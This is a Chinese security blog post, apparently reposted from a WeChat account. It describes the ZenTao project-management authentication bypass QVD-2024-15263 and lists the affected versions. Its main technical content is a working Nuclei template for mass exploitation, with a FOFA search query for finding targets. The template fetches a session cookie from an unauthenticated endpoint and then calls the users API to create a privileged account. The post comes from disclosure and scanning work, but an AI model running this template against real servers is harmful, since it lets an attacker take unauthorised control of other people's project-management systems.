禅道身份认证绕过漏洞QVD-2024-15263

admin 2024年4月28日12:55:48评论167 views字数 1672阅读5分34秒阅读模式

禅道身份认证绕过漏洞

禅道由禅道软件(青岛)有限公司开发,国产开源项目管理软件。它集项目管理、产品管理、项目管理、质量管理、DevOps、知识库、BI效能、工作流、学堂、反馈管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。禅道,专注研发项目管理!

影响范围

16.x <= 禅道项目管理系统< 18.12(开源版)

6.x <= 禅道项目管理系统< 8.12(企业版)

3.x <= 禅道项目管理系统< 4.12(旗舰版)

漏洞复现

1. 访问如下地址获取cookie

禅道身份认证绕过漏洞QVD-2024-15263

2. 创建新用户,部分返回403

禅道身份认证绕过漏洞QVD-2024-15263

3. 再次发包,确认新用户创建完成

禅道身份认证绕过漏洞QVD-2024-15263

批量利用

禅道身份认证绕过漏洞QVD-2024-15263

id: zentao_zentaosid_unauthorizedinfo:  name: zentao_zentaosid_unauthorized  author: Xc1Ym  severity: medium  description: zentao_zentaosid_unauthorized  metadata:    max-request: 1    verified: true    fofa-query: title="Login - ZenTao", app="易软天创-禅道系统"  tags: unauthorized,zentao,hwvariables:  account: '{{rand_base(6)}}'  password: 'Admin123@'http:  - raw:      - |        GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1        Host: {{Hostname}}      - |        POST /zentao/api.php/v1/users HTTP/1.1        Cookie: {{cookie1}}        Host: {{Hostname}}        {"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}      - |        POST /zentao/api.php/v1/users HTTP/1.1        Cookie: {{cookie1}}        Host: {{Hostname}}        {"account": "{{account}}", "password": "{{password}}", "realname": "{{account}}", "role": "top", "group": "1"}    extractors:      - type: kval        name: cookie1        part: header_1        internal: true        kval:          - Set_Cookie      - type: json        part: body_2        json:          - .account    matchers:      - type: word        part: body        words:          - "\u300e\u7528\u6237\u540d\u300f\u5df2\u7ecf\u6709\u300e"# digest: 4a0a00473045022100aa690090f5134196337280620f55dabb356f8e63df6e622aab940f5fb0bcb0a10220303ed3a2ffc58eb6b6da31577912e55daf41763b1e96400ed00e61de69b46c63:6b2dd5af372f02ed15a56faf8ad98cf9

ref: https://mp.weixin.qq.com/s/F6EorG4kuNLeD1-BSg_plQ

原文始发于微信公众号(Hack All Sec):禅道身份认证绕过漏洞QVD-2024-15263

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月28日12:55:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   禅道身份认证绕过漏洞QVD-2024-15263https://cn-sec.com/archives/2694542.html

发表评论

匿名网友 填写信息